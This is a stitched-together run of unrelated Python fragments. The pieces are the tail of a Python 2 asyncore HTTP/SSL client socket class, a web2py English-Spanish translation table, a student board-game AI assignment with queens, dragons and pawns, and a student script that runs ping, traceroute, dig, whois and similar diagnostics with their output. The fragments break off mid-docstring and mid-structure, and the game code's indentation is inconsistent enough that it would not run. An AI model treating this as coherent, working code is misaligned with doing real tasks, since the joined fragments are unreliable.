return len(buf) # consume from asyncore
elif e.args[0] == ssl.SSL_ERROR_WANT_READ:
log.warning("write_want_read")
self.ssl_want = 'read'
return 0
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send', r)
return r
else:
try:
# we've got saved bytes--send them first.
r = self.socket.send(self.lastbuffer)
except ssl.SSLError, e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.warning("write_want_write (buffer)")
self.ssl_want = 'write'
elif e.args[0] == ssl.SSL_ERROR_WANT_READ:
log.warning("write_want_read (buffer)")
self.ssl_want = 'read'
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send (buffer)', r)
elif r < len(self.lastbuffer):
self.lastbuffer = self.lastbuffer[r:]
else:
self.lastbuffer = ''
return 0
def initiate_send(self):
#if there's nothing else in the socket buffer, the super class initiate_send won't call send
# and self.lastbuffer won't be flushed.
if self.lastbuffer:
assert self.ssl_want == 'write'
self.send(None)
return
return super(AsyncHttpSocket, self).initiate_send()
def request(self, request):
if not self.waiting_for == 'request':
raise Exception('Socket not ready for a request', self, self.waiting_for)
else:
self.current_request = request
self._send_request()
def _send_request(self):
self.waiting_for = 'status'
self.set_terminator(self.CRLF)
r = self.current_request
self._push_start_line(r)
self._push_headers(r)
self._push_body(r)
def _format_headers(self, req):
buf = stringio()
write = buf.write
header_dicts = [req.headers, req.unredirected_hdrs]
for d in header_dicts:
for key, value in d.items():
write(key); write(': ')
write(value); write('\r\n')
write('\r\n')
return buf.getvalue()
def _push_start_line(self, req):
if self._is_proxy:
selector = req.get_full_url()
else:
selector = req.get_selector()
if not selector:
selector = '/'
start_line = '%s %s %s\r\n' % (req.get_method(), selector.encode('ascii'), self._http_vsn_str)
self.push(start_line)
self._sent_data = True
#_log.debug('pushed start line: %r', start_line)
def _push_headers(self, req):
data = self._format_headers(req)
self.push(data)
#_log.debug('pushed headers: %r', data)
def _push_body(self, req):
if req.has_data():
data = req.get_data()
else:
data = ''
# As soon as the producer's .more returns '', the callback will go off, signalling that the request has been sent.
# With no data, this happens immediately. With data, it happens at the end.
prod = producer_cb(data, success = lambda: self.on_request(), error = lambda e: self.on_request_error(e))
self.push_with_producer(prod)
#_log.debug('pushed body: %r', data)
# ------ AsyncSocket methods
def handle_connect(self):
if not self._connected:
self._connected = True
self.on_connect()
def handle_close(self):
log.debug('handle_close for %r', self)
self._connected = False
self.close()
if self.get_terminator() in (None, 0) and self.waiting_for == 'body':
self.on_body()
if self._sent_data:
self.on_close()
else:
self.on_connection_error('socket closed before data sent')
def handle_error(self, e=None):
log.debug('handle_error for %r', self)
if e is None:
e = sys.exc_info()[1]
if isinstance(e, socket.error):
errno, _errmsg = e.args
if errno in _ok_errors:
return
log.info('Socket error: %r', e)
if sys.exc_info() != (None, None, None):
traceback.print_exc()
self._connected = False
self.close()
self.on_connection_error(e)
def handle_expt(self):
log.debug('handle_expt for %r', self)
self.handle_error(OOB_Exception("OOB data"))
def collect_incoming_data(self, data):
if self.waiting_for == 'status':
self.status_line += data
elif self.waiting_for == 'headers':
self.buffer.append(data)
elif self.waiting_for == 'body':
if self.buffer:
old_data = ''.join(self.buffer)
self.collect_body_data(old_data)
self.set_terminator(self.terminator - len(old_data))
del self.buffer[:]
if self.terminator == 0: # Unlikely, but just in case
self.found_terminator()
self.collect_body_data(data)
elif self.waiting_for == 'chunk-header':
self.collect_chunk_header(data)
elif self.waiting_for == 'chunk-body':
self.collect_chunk_data(data)
elif self.waiting_for == 'request':
log.error("Received data when no response was expected. This is an error and the socket will close. The data was: %r", data)
self.handle_error(Exception("Unexpected data received: %r" % data))
else:
raise AssertionError("Shouldn't be waiting for this: %r" % self.waiting_for)
def found_terminator(self):
#_log.debug('Found terminator %r. Currently waiting for: %r', self.terminator, self.waiting_for)
if self.waiting_for == 'status':
status_line = self.status_line
if status_line == '':
new_term = self.CRLF
else:
new_term = self.on_status_line()
self.set_terminator(new_term)
elif self.waiting_for == 'headers':
data = ''.join(self.buffer)
del self.buffer[:]
self.on_headers(data) # Changes 'waiting_for' to 'body' or 'request' or 'chunk-header' and sets new terminator
elif self.waiting_for == 'body':
if self.body_length:
self.on_body() # Changes 'waiting_for' to 'request'
else:
log.warning('Received chunk for body of unknown size.')
self.set_terminator(512)
elif self.waiting_for == 'chunk-header':
new_term = self.process_chunk_header()
self.set_terminator(new_term)
elif self.waiting_for == 'chunk-body':
new_term = self.process_chunk_data()
self.set_terminator(new_term)
else:
raise AssertionError("Unexpected 'waiting_for' for found_terminator: %r. Current buffer is: %r", self.waiting_for, self.buffer)
# ------- End AsyncSocket methods
# ------- Helper methods
def collect_body_data(self, data):
self.current_body.write(data)
def collect_chunk_header(self, data):
self.chunk_header += data
def collect_chunk_data(self, data):
self.current_chunk.write(data)
def process_chunk_header(self):
hdr, self.chunk_header = self.chunk_header, ''
if hdr == '':
# This happens every other time this function is called: the protocol
# terminates each chunk body with a CRLF, so an empty "header" here is that
# trailing CRLF, and the next thing to read is the real chunk-size line.
return self.CRLF
#log.debug('Got chunk header: %r', hdr)
hdr_parts = hdr.split(';', 1)
sz, _rest = hdr_parts[0], hdr_parts[1:]
chunk_size = int(sz, 16)
self.waiting_for = 'chunk-body'
if chunk_size == 0:
return self.CRLF
else:
return chunk_size
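# e.g. a chunk header of '1a; ext=foo' parses to int('1a', 16) == 26 bytes of
# chunk body to read next, per HTTP/1.1 chunked transfer encoding.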
def process_chunk_data(self):
chunk = self.current_chunk.getvalue()
self.current_chunk = stringio()
if len(chunk) == 0:
self.waiting_for = 'request'
self.on_body()
return self.CRLF
else:
header = self.chunk_header
self.chunk_header = ''
self.waiting_for = 'chunk-header'
return self.decode_chunk(header, chunk)
# TODO: return new terminator ("\r\n" ?)
@property
def original_request(self):
return getattr(self.current_request, '_orig_request', self.current_request)
def decode_chunk(self, header, chunk):
if chunk[:2] == '\r\n':
chunk = chunk[2:]
req = self.original_request
req.on_chunk(chunk)
if req.accumulate_body:
self.current_body.write(chunk)
return self.CRLF
# --------- End helpers
# --------- Events
@Events.event
def on_connect(self):
'''
on_connect: this event is thrown when this socket connects.
the socket is the only event argument.
'''
#self._connected_host, self._connected_port = self.getpeername()
return self
@Events.event
def on_close(self):
'''
on_close: this event is thrown when this socket is closed normally.
the socket is the only event argument.
'''
return self
@Events.event
def on_connection_error(self, e):
'''
on_connection_error: this event is thrown when a connection related (but non-HTTP) error occurs.
the event arguments are this socket and the error.
'Diseño por',
'detecting': 'detectando',
'Device': 'Dispositivo',
'device already unlocked': 'device already unlocked',
'device must be unlocked by another one': 'device must be unlocked by another one',
'device not found': 'dispositivo no encontrado',
'Devices': 'Dispositivos',
'Di Impresionnumero': 'Impresión Nº',
'Di Numeroventas': 'Ac.Num.Ventas',
'Di Valorventas': 'Ac. Ventas',
'Direct links': 'Enlaces directos',
'DISK': 'DISCO',
'Disk Cache Keys': 'Llaves de Caché en Disco',
'Disk Cleared': 'Disco limpiado',
'Dispositivo': 'Dispositivo',
'Documentation': 'Documentación',
"Don't know what to do?": '¿No sabe que hacer?',
'done!': '¡hecho!',
'done: %s %s': 'Correcto: %s %s',
'Download': 'Descargas',
'dónde se utiliza': 'dónde se utiliza',
'E-mail': 'Correo electrónico',
'edit': 'editar',
'EDIT': 'EDITAR',
'Edit': 'Editar',
'Edit %(entity)s': 'Editar %(entity)s',
'Edit application': 'Editar aplicación',
'edit controller': 'editar controlador',
'Edit current record': 'Edite el registro actual',
'Edit Profile': 'Editar Perfil',
'edit profile': 'editar perfil',
'Edit This App': 'Edite esta App',
'Editing file': 'Editando archivo',
'Editing file "%s"': 'Editando archivo "%s"',
'Eliminar': 'Eliminar',
'Email': 'Email',
'Email and SMS': 'Correo electrónico y SMS',
'Email sent': 'Correo electrónico enviado',
'Email verification': 'Verificación de email',
'Email verified': 'Email verificado',
'End of impersonation': 'Fin de suplantación',
'Enter a number': 'Introduzca un número',
'enter a number between %(min)g and %(max)g': 'introduzca un número entre %(min)g y %(max)g',
'Enter a number between %(min)g and %(max)g': 'Introduzca un numero entre %(min)g y %(max)g',
'Enter a valid email address': 'Introducir una dirección de correo válida',
'enter a value': 'introduzca un valor',
'Enter a value': 'Introducir un valor',
'Enter an integer between %(min)g and %(max)g': 'Introduzca un entero entre %(min)g y %(max)g',
'enter an integer between %(min)g and %(max)g': 'introduzca un entero entre %(min)g y %(max)g',
'Enter an integer greater than or equal to %(min)g': 'Introduzca un entero mayor o igual que %(min)g',
'enter date and time as %(format)s': 'introduzca fecha y hora como %(format)s',
'Enter date and time as %(format)s': 'Introduzca fecha y hora como %(format)s',
'Enter date as %(format)s': 'Introduzca fecha como %(format)s',
'Enter from %(min)g to %(max)g characters': 'Introduzca de %(min)g a %(max)g caracteres',
'Entity type': 'Tipo Entidad',
'Error': 'Error',
'Error logs for "%(app)s"': 'Bitácora de errores en "%(app)s"',
'Error: %s. Se canceló toda la copia': 'Error: %s. Se canceló toda la copia',
'errors': 'errores',
'Errors': 'Errores',
'Errors in form, please check it out.': 'Hay errores en el formulario, por favor compruébelo.',
'Existe referencia al atributo actual ': 'Existe referencia al atributo actual ',
'export as csv file': 'exportar como archivo CSV',
'Export:': 'Exportar:',
'exposes': 'expone',
'extends': 'extiende',
'failed to reload module': 'la recarga del módulo ha fallado',
'FAQ': 'FAQ',
'Fecha': 'Fecha',
'Fechamonedero': 'Fecha Monedero',
'file "%(filename)s" created': 'archivo "%(filename)s" creado',
'file "%(filename)s" deleted': 'archivo "%(filename)s" eliminado',
'file "%(filename)s" uploaded': 'archivo "%(filename)s" subido',
'file "%(filename)s" was not deleted': 'archivo "%(filename)s" no fué eliminado',
'file "%s" of %s restored': 'archivo "%s" de %s restaurado',
'file changed on disk': 'archivo modificado en el disco',
'file does not exist': 'archivo no existe',
'file saved on %(time)s': 'archivo guardado %(time)s',
'file saved on %s': 'archivo guardado %s',
'Fill form, please': 'Rellene el formulario, por favor',
'Filtro Descripcion': 'Filtro Descripcion',
'First name': 'Nombre',
'Forgot username?': '¿Olvidó el nombre de usuario?',
'Form consecutive submissions not allowed. Try re-submitting or refreshing the form page.': 'Form consecutive submissions not allowed. Try re-submitting or refreshing the form page.',
'Form has errors': 'Formulario con errores',
'form has errors': 'Formulario contiene errores',
'Forms and Validators': 'Formularios y validadores',
'Formula': 'Formula',
'Formula incorrecta: ': 'Formula incorrecta: ',
'Formula Tar': 'Formula Tar',
'Formula Trg': 'Formula Trg',
'Free Applications': 'Aplicaciones Libres',
'Free register': 'Registro gratuito',
'From accepted': 'Formulario aceptado',
'From tubes': 'Desde tubos',
'Full': 'Completo',
'Functions with no doctests will result in [passed] tests.': 'Funciones sin doctests equivalen a pruebas [aceptadas].',
'Fórm.Destino': 'Fórm.Destino',
'Fórm.Origen': 'Fórm.Origen',
'Fórmula': 'Fórmula',
'Fórmula contiene referencia al atributo actual ': 'Fórmula contiene referencia al atributo actual ',
'Fórmula incorrecta: ': 'Fórmula incorrecta: ',
'Fórmula predet.': 'Fórmula predet.',
'Get a Bluetooth o USB Serial adapter to communicate with the machines': 'Adquiera un adaptador Bluetooth o USB Serie para comunicar con las máquinas',
'Gpslat': 'GPS Latitud',
'Gpslon': 'GPS Longitud',
'Group %(group_id)s created': 'Grupo %(group_id)s creado',
'Group by machine': 'Agrupar por máquina',
'Group ID': 'ID de Grupo',
'Group uniquely assigned to user %(id)s': 'Grupo asignado únicamente al usuario %(id)s',
'Groups': 'Grupos',
'Grupo': 'Grupo',
'Grupos': 'Grupos',
'Hello Man': 'Hola, tío',
'Hello World': 'Hola Mundo',
'Help': 'Ayuda',
'help': 'ayuda',
'Helping web2py': 'Helping web2py',
'Heredable': 'Heredable',
'Heredado': 'Heredado',
'Home': 'Inicio',
'How did you get here?': '¿Cómo llegaste aquí?',
'HTML': 'HTML',
'html': 'html',
'HTML export of visible columns': 'Exportar a HTML las columnas visibles',
'Id': 'Id',
'Id Idioma': 'Id Idioma',
'Id Pieza': 'Id Pieza',
'Idembalaje': 'Idembalaje',
'Idembalajeprincipal': 'Idembalajeprincipal',
'Idioma': 'Idioma',
'Idiomas': 'Idiomas',
'IMEI Phone not matches with registered device': 'IMEI Phone not matches with registered device',
'Impersonate': 'Suplantar',
'import': 'importar',
'Import/Export': 'Importar/Exportar',
'in': 'en',
'in process': 'en proceso',
'In tubes': 'En tubos',
'includes': 'incluye',
'Index': 'Índice',
'insert new': 'inserte nuevo',
'insert new %s': 'inserte nuevo %s',
'Install date in new client': 'Fecha instalación en nuevo cliente',
'Install/Uninstall Machine': 'Instalar/Desinstalar Máquina',
'Installation date': 'Fecha de instalación',
'Installations': 'Instalaciones',
'Installations history': 'Histórico de instalaciones',
'Installed applications': 'Aplicaciones instaladas',
'Insufficient privileges': 'Privilegios insuficientes',
'internal error': 'error interno',
'Internal State': 'Estado Interno',
'Introduction': 'Introducción',
'Invalid action': 'Acción inválida',
'Invalid email': 'Correo electrónico inválido',
'invalid expression': 'expresión inválida',
'Invalid expression': 'Expresión inválida',
'Invalid login': 'Inicio de sesión inválido',
'invalid password': 'contraseña inválida',
'Invalid Query': 'Consulta inválida',
'Invalid query': 'Consulta incorrecta',
'invalid request': 'solicitud inválida',
'Invalid reset password': 'Reinicio de contraseña inválido',
'invalid ticket': 'tiquete inválido',
'Invalid username': 'Nombre usuario no válido',
'Is Active': 'Está Activo',
'Iso Code': 'Iso Code',
'JSON': 'JSON',
'JSON export of visible columns': 'JSON exportar columnas visibles',
'Key': 'Llave',
'Kit': 'Kit',
'Kit comp.': 'Kit comp.',
'Kit Destino': 'Kit Destino',
'Kit Origen': 'Kit Origen',
'Kitds': 'Kitds',
'Kits': 'Kits',
'Kits afectados': 'Kits afectados',
'Kits copiar': 'Kits copiar',
'Kits de la ubicación': 'Kits de la ubicación',
'Kits filtrados': 'Kits filtrados',
'Kits por Ubicacion': 'Kits por Ubicacion',
'Kits por ubicación': 'Kits por ubicación',
'Kits totales': 'Kits totales',
'la configuración debe ser de último nivel': 'la configuración debe ser de último nivel',
'Language Code': 'Language Code',
'language file "%(filename)s" created/updated': 'archivo de lenguaje "%(filename)s" creado/actualizado',
'Language files (static strings) updated': 'Archivos de lenguaje (cadenas estáticas) actualizados',
'languages': 'lenguajes',
'Languages': 'Lenguajes',
'languages updated': 'lenguajes actualizados',
'Last name': 'Apellido',
'Last read': 'Última lectura',
'Last saved on:': 'Guardado en:',
'Layout': 'Diseño de página',
'Layout Plugins': 'Plugins de diseño',
'Layouts': 'Diseños de páginas',
'lecturas.descuadre': 'lecturas.descuadre',
'lecturas.M_Retirado': 'lecturas.M_Retirado',
'lecturas.VP_Billetes': 'lecturas.VP_Billetes',
'lecturas.VP_DineroHucha': 'lecturas.VP_DineroHucha',
'lecturas.VP_DispManual': 'lecturas.VP_DispManual',
'lecturas.VP_LlenadoManual': 'lecturas.VP_LlenadoManual',
'lecturas.VP_ValorVentas': 'lecturas.VP_ValorVentas',
'Level': 'Level',
'Lft': 'Lft',
'License for': 'Licencia para',
'List': 'Lista',
'Live Chat': 'Chat en vivo',
'loading...': 'cargando...',
'Locked': 'Bloqueado',
'Log In': 'Entrar',
'Log Out': 'Salir',
'Logged in': 'Sesión iniciada',
'Logged out': 'Sesión finalizada',
'Login': 'Inicio de sesión',
'login': 'inicio de sesión',
'Login disabled by administrator': 'Inicio de sesión deshabilitado por el administrador',
'Login to the Administrative Interface': 'Inicio de sesión para la Interfaz Administrativa',
'logout': 'fin de sesión',
'Logout': 'Fin de sesión',
'Lost Password': 'Contraseña perdida',
'Lost password?': '¿Olvidó la contraseña?',
'lost password?': '¿olvidó la contraseña?',
'M Retirado': 'Retirado',
'M_Retirado': 'Retirado',
'Mac': 'MAC',
'Machine': 'Máquina',
'Machine history added': 'Instalación añadida',
'Machine Installations history': 'Historial de instalaciones de máquina',
'Machine not exits': 'Máquina no existe',
'Machine read added': 'Lectura de máquina creada',
'Machine read upload': 'Subida de lectura de máquina',
'Machine reading added': 'lectura de máquina creada',
'machines': 'máquinas',
'Machines': 'Máquinas',
'Machines reading pendant': 'Máquinas pendientes de lectura',
'Machines#': 'Num.Máquinas',
'machines_installs': 'Instalaciones de máquina',
'Main Menu': 'Menú principal',
'Main Site': 'Main Site',
'Manage Cache': 'Gestionar la Caché',
'Manual': 'Manual',
'Manual down': 'Descarga manual',
'Manual fill': 'Llenado manual',
'Maquina': 'Máquina',
'Maquinas': 'Máquinas',
'Matriz': 'Matriz',
'Membresía': 'Membresía',
'Menu Model': 'Modelo "menu"',
'merge': 'combinar',
'Mod': 'Mod',
'Mod Atr': 'Mod Atr',
'Mod Tipo': 'Mod Tipo',
'Mod Tipo Ori': 'Mod Tipo Ori',
'Mod Um': 'Mod Um',
'Mod Val Def': 'Mod Val Def',
'Mod Val Def Vis': 'Mod Val Def Vis',
'Model': 'Modelo',
'Models': 'Modelos',
'models': 'modelos',
'Modificar': 'Modificar',
'Modificar en lote...': 'Modificar en lote...',
'Modified By': 'Modificado Por',
'Modified On': 'Modificado En',
'Modules': 'Módulos',
'modules': 'módulos',
'Modulos': 'Módulos',
'Movido': 'Movido',
'Must be DD/MM/YYYY!': '¡Debe ser DD/MM/YYYY!',
'Must be MM-DD-YYYY!': '¡Debe ser MM-DD-YYYY!',
'Must be MM/DD/YYYY!': '¡Debe ser MM/DD/YYYY!',
'must be YYYY-MM-DD HH:MM:SS!': '¡debe ser YYYY-MM-DD HH:MM:SS!',
'must be YYYY-MM-DD!': '¡debe ser YYYY-MM-DD!',
'Must ben MM-DD-YYYY!': '¡Debe ser MM-DD-YYYY!',
'My Sites': 'Mis Sitios',
'Mínimo de Kits necesarios': 'Mínimo de Kits necesarios',
'Mínimo de módulos necesarios': 'Mínimo de módulos necesarios',
'Módulo': 'Módulo',
'Módulo comp.': 'Módulo comp.',
'Módulo componente introducido es contenedor del módulo padre': 'Módulo componente introducido es contenedor del módulo padre',
'Módulo Destino': 'Módulo Destino',
'Módulo no puede estar vacío': 'Módulo no puede estar vacío',
'Módulo Origen': 'Módulo Origen',
'Módulos': 'Módulos',
'Name': 'Nombre',
'Naves': 'Naves',
'new': 'nuevo',
'New': 'Nuevo',
'New %(entity)s': 'Nuevo %(entity)s',
'new application "%s" created': 'nueva aplicación "%s" creada',
'New password': 'Nueva contraseña',
'New Record': 'Registro nuevo',
'new record inserted': 'nuevo registro insertado',
'New Search': 'Añadir condición',
'Next': 'Next',
'next %s rows': 'siguientes %s registros',
'next 100 rows': '100 filas siguientes',
'Ninguno seleccionado': 'Ninguno seleccionado',
'Nivel': 'Nivel',
'No account yet?': '¿No tiene cuenta todavía?',
'No autorizado': 'No autorizado',
'No cambiar': 'No cambiar',
'No databases in this application': 'No hay bases de datos en esta aplicación',
'No eliminable': 'No eliminable',
'No está en Rango de valores': 'No está en Rango de valores',
'No está en rango de valores': 'No está en rango de valores',
'No records found': 'No se han encontrado registros',
'Node Type': 'Node Type',
'Normal': 'Normal',
'Not authorized': 'No autorizado',
'not authorized': 'no autorizado',
'Not Authorized': 'NO AUTORIZADO',
'Not exists': 'Not exists',
'not in': 'no en',
'Nuevo': 'Nuevo',
'Numero': 'Numero',
'Numeroserie': 'Numero Serie',
'O.T. Comodín no encontrada': 'O.T. Comodín no encontrada',
'O.T. Comodín of:1 t:9060019 no encontrada': 'O.T. Comodín of:1 t:9060019 no encontrada',
'Object or table name': 'Nombre del objeto o tabla',
'Observaciones': 'Observaciones',
'OK': 'OK',
'Old password': 'Contraseña antigua',
'Online book': 'Libro en línea',
'Online examples': 'Ejemplos en línea',
# A2
# <NAME>
import copy as cp
import time as time
# Tokens for Queens, Dragons and Pawns -------
# @Type - queen, dragon or pawn
# @Alive - True if the token is alive
# __str__ - Returns 'Q','D','P' for each valid type
class token:
def __init__(self, thing):
self.type = thing
self.alive = True
def __str__(self):
if self.type == 'dragon':
return 'D'
elif self.type == 'queen':
return 'Q'
elif self.type == 'pawn':
return 'P'
else:
return '0'
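# Example (sketch): tokens render as single letters, e.g.
#   str(token('queen')) == 'Q' and str(token('dragon')) == 'D'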
# Useful Functions -------------------
# @Thing - any valid object
# Return - True if object is of class Token
def isToken(thing):
return isinstance(thing, token)
# @Thing - any valid object
# Return - True if object is of class Token with type dragon
def isDragon(thing):
if isToken(thing):
return thing.type == 'dragon'
else:
return False
# @Thing - any valid object
# Return - True if object is of class Token with type queen
def isQueen(thing):
if isToken(thing):
return thing.type == 'queen'
else:
return False
# @Thing - any valid object
# Return - True if object is of class Token with type pawn
def isPawn(thing):
if isToken(thing):
return thing.type == 'pawn'
else:
return False
# @Thing - any valid object
# @Foe - any valid object
# Return - True if two parameters are tokens of opposite teams
def isEnemy(thing, foe):
if isPawn(thing) and (isDragon(foe) or isQueen(foe)):
return True
elif isPawn(foe) and (isDragon(thing) or isQueen(thing)):
return True
else:
return False
# @m1 - tuple of coordinates
# @m2 - tuple of coordinates
# Returns True if m2 is one square diagonally in any direction of m1
def isDiagonal(m1, m2):
    return abs(m1[0] - m2[0]) == 1 and abs(m1[1] - m2[1]) == 1
# @m1 - tuple of coordinates
# @m2 - tuple of coordinates
# Returns True if m2 is one square in any cardinal direction of m1
def isStraight(m1, m2):
    return abs(m1[0] - m2[0]) + abs(m1[1] - m2[1]) == 1
# @stringState - string of 25 chars
# Returns a 5x5 list of lists of stringState
# TODO add a check for 25 chars
def strToState(stringState):
    return [list(stringState[i * 5:(i + 1) * 5]) for i in range(5)]
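# Example (sketch, assuming the row-major 25-char encoding produced by
# game.str()):
#   strToState('QDP00' * 5)[0] == ['Q', 'D', 'P', '0', '0']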
# Game State and Related functions -----------
class game:
    def __init__(self, board=None, player=1):
self.x = 5
self.y = 5
# Token Area
self.q = token('queen')
self.d = [token('dragon') for c in range(3)]
self.p = [token('pawn') for c in range(5)]
# Board area
        if board is None:
self.board = [[0 for y in range(5)] for x in range(5)]
self.board[2][0] = self.q
self.board[1][1] = self.d[1]
self.board[2][1] = self.d[2]
self.board[3][1] = self.d[0]
self.board[0][4] = self.p[1]
self.board[1][4] = self.p[2]
self.board[2][4] = self.p[3]
self.board[3][4] = self.p[4]
self.board[4][4] = self.p[0]
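            # Initial layout (board[x][y]; rows below are y = 0..4, top to
            # bottom, exactly as rendered by display()):
            #
            #   . . Q . .
            #   . D D D .
            #   . . . . .
            #   . . . . .
            #   P P P P P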
else:
self.board = board
# Human and AI Player Area
self.wights = 1
self.queens = 2
self.whoseTurn = player
self.wightsScore = 0
self.queensScore = 0
self.humanPlayer = 2
self.AIPlayer = 1
self.cachedWinner = False
self.cachedWin = False
# SETUP FUNCTIONS ---------------------------------
def initPlayers(self, Human=False):
# TODO Add human Toggle
if Human:
return self.wights
# Human Input Functions ----------------------------
# Game initiation function. Denotes who the Human shall play
def selectPlayer(self):
player = input("Select P1 or P2: ")
if player == "P1":
self.humanPlayer = 1
self.AIPlayer = 2
elif player == "P2":
self.humanPlayer = 2
self.AIPlayer = 1
# @input - Asks for humans token coordinate
# @input - Asks for a square to move them to
# Returns the resultant state
def inputMove(self):
legalMove = False
while not legalMove:
start = tuple(int(x.strip()) for x in input("Who do you want to move? ").split(','))
            print("That's a ", self.board[start[0]][start[1]])
end = tuple(int(x.strip()) for x in input("Where do you want to move them?").split(','))
legalMove = self.makeMove(start, end)
if isinstance(legalMove, game):
legalMove.whoseTurn = self.togglePlayer()
return legalMove
# GAME PLAY FUNCTIONS ------------------------------
# @Modify - Whoseturn Alternate
    def togglePlayer(self):
        self.whoseTurn = 2 if self.whoseTurn == 1 else 1
        return self.whoseTurn
# Return - True if Wights turn
def isMinNode(self):
if self.whoseTurn == 2:
# player 1 min
return True
else:
# player 2 min
return False
# Return - True if Queens turn
def isMaxNode(self):
if self.whoseTurn == 1:
# player 1 max
return True
else:
# player 2 max
return False
# Returns - Positive value for Queens win,
# - Negative for Wights win
# - 0 for game in progress
def winFor(self):
# Queen is Dead
if self.q.alive is False:
self.cachedWin = True
self.cachedWinner = self.wights
return -200
else:
x = False
for i in range(5):
if isQueen(self.board[i][4]):
x = True
if x:
self.cachedWin = True
self.cachedWinner = self.queens
return 200
else:
return 0
# Returns - True if gamestate is either a win or draw for either player
    # TODO - All pawns dying is not handled as a terminal state
def isTerminal(self):
qAlive = False
x = False
for i in self.board:
for j in i:
if isQueen(j):
qAlive = j.alive
for i in range(5):
if isQueen(self.board[i][4]):
x = True
return (not qAlive) or x
# See winFor
def utility(self):
return self.winFor()
# Returns a new copy of board
def getBoard(self):
return cp.deepcopy(self.board)
# DISPLAY FUNCTIONS -----------------------------
# Pretty display
def display(self):
print('')
for i in range(5):
for j in range(5):
print(self.board[j][i], end='')
print('')
# Debugging display
def __str__(self):
s = ''
for i in range(self.y):
for j in range(self.x):
s += str(self.board[j][i])
return s
# Returns a string of current state
# Note - Deconversion comes from Useful functions - strToState()
def str(self):
s = ''
for i in range(self.y):
for j in range(self.x):
s += str(self.board[j][i])
return s
# MOVEMENT FUNCTIONS -----------------------------
# @m - Coordinate on board
# Return - All adjacent moves
def nextAvailableMoves(self, m):
x1 = m[0]
y1 = m[1]
        # Enumerate the eight surrounding squares and keep those that fall on
        # the 5x5 board (this collapses the nine edge/corner cases).
        neighbours = {(x1 + dx, y1 + dy)
                      for dx in (-1, 0, 1) for dy in (-1, 0, 1)
                      if (dx, dy) != (0, 0)}
        return {(x, y) for (x, y) in neighbours if 0 <= x < 5 and 0 <= y < 5}
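    # Example (sketch): corner squares have exactly three reachable
    # neighbours, e.g. game().nextAvailableMoves((0, 0)) returns
    # {(0, 1), (1, 0), (1, 1)}.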
#!/usr/bin/env python3
#! @author: @ruhend(<NAME>)
#! Assignment 5
#! Network Commands
import subprocess
command = [ "ping -c 5 www.google.com",
"traceroute www.google.com",
"telnet www.www.google.com 443",
"ifconfig",
"netstat",
"ifconfig",
"dig www.google.com",
"nslookup www.google.com",
"whois www.google.com" ]
# These commands would work only if the binary is available.
for i in command:
print("**********************")
print(i)
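    # Note: without stdout=subprocess.PIPE and stderr=subprocess.PIPE the
    # child writes straight to the terminal and communicate() returns
    # (None, None) -- which is why every block in the captured output below
    # ends with "> None".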
process = subprocess.Popen(i.split())
op, er = process.communicate()
print("> "+str(er))
#! OUTPUT
# **********************
# ping -c 5 www.google.com
# PING www.google.com (172.16.58.3): 56 data bytes
# 64 bytes from 172.16.58.3: icmp_seq=0 ttl=54 time=38.735 ms
# 64 bytes from 172.16.58.3: icmp_seq=1 ttl=54 time=36.221 ms
# 64 bytes from 172.16.58.3: icmp_seq=2 ttl=54 time=38.962 ms
# 64 bytes from 172.16.58.3: icmp_seq=3 ttl=54 time=37.588 ms
# 64 bytes from 172.16.58.3: icmp_seq=4 ttl=54 time=30.758 ms
# --- www.google.com ping statistics ---
# 5 packets transmitted, 5 packets received, 0.0% packet loss
# round-trip min/avg/max/stddev = 30.758/36.453/38.962/3.009 ms
# > None
# **********************
# traceroute www.google.com
# traceroute to www.google.com (172.16.58.3), 64 hops max, 52 byte packets
# 1 192.168.245.35 (192.168.245.35) 2.478 ms 2.046 ms 1.957 ms
# 2 192.168.0.1 (192.168.0.1) 5.785 ms 5.339 ms 5.780 ms
# 3 10.210.0.1 (10.210.0.1) 15.711 ms 33.363 ms 30.219 ms
# 4 172.16.58.3 (172.16.58.3) 18.892 ms 19.278 ms 20.490 ms
# 5 172.16.31.10 (172.16.31.10) 20.446 ms 24.005 ms 20.509 ms
# 6 172.16.17.32 (172.16.17.32) 20.472 ms 17.917 ms 16.021 ms
# 7 10.241.1.6 (10.241.1.6) 19.072 ms 20.082 ms 22.452 ms
# 8 10.240.254.100 (10.240.254.100) 19.325 ms 25.724 ms 26.737 ms
# 9 10.240.254.1 (10.240.254.1) 31.239 ms 24.672 ms 22.923 ms
# 10 10.241.1.1 (10.241.1.1) 20.272 ms 40.104 ms 28.003 ms
# 11 172.16.58.3.static.jio.com (172.16.58.3) 44.805 ms 28.655 ms 23.416 ms
# 12 * * *
# 13 * * *
# 14 192.168.3.11 (192.168.3.11) 68.625 ms 35.987 ms
# 172.16.31.10 (172.16.31.10) 39.474 ms
# 15 192.168.127.12 (192.168.127.12) 43.252 ms * *
# 16 172.16.17.32 (172.16.17.32) 35.864 ms
# 192.168.3.11 (192.168.3.11) 30.421 ms
# 192.168.3.11 (192.168.3.11) 32.849 ms
# 17 172.16.58.3 (172.16.58.3) 28.856 ms
# maa05s15-in-f4.1e100.net (142.250.77.100) 35.301 ms 40.754 ms
# > None
# **********************
# telnet www.www.google.com 443
# www.www.google.com: nodename nor servname provided, or not known
# > None
# **********************
# ifconfig
# lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
# options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
# inet 127.0.0.1 netmask 0xff000000
# inet6 ::1 prefixlen 128
# inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
# nd6 options=201<PERFORMNUD,DAD>
# gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
# stf0: flags=0<> mtu 1280
# XHC20: flags=0<> mtu 0
# utun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1380
# inet6 fe80::5252:dbe:6a2f:3513%utun0 prefixlen 64 scopeid 0x5
# nd6 options=201<PERFORMNUD,DAD>
# utun1: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 2000
# inet6 fe80::6377:ae36:1ccb:2c7d%utun1 prefixlen 64 scopeid 0x6
# nd6 options=201<PERFORMNUD,DAD>
# en2: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
# options=400<CHANNEL_IO>
# ether 2e:08:64:f1:52:bf
# inet6 fe80::8c8:de31:3987:fc73%en2 prefixlen 64 secured scopeid 0x8
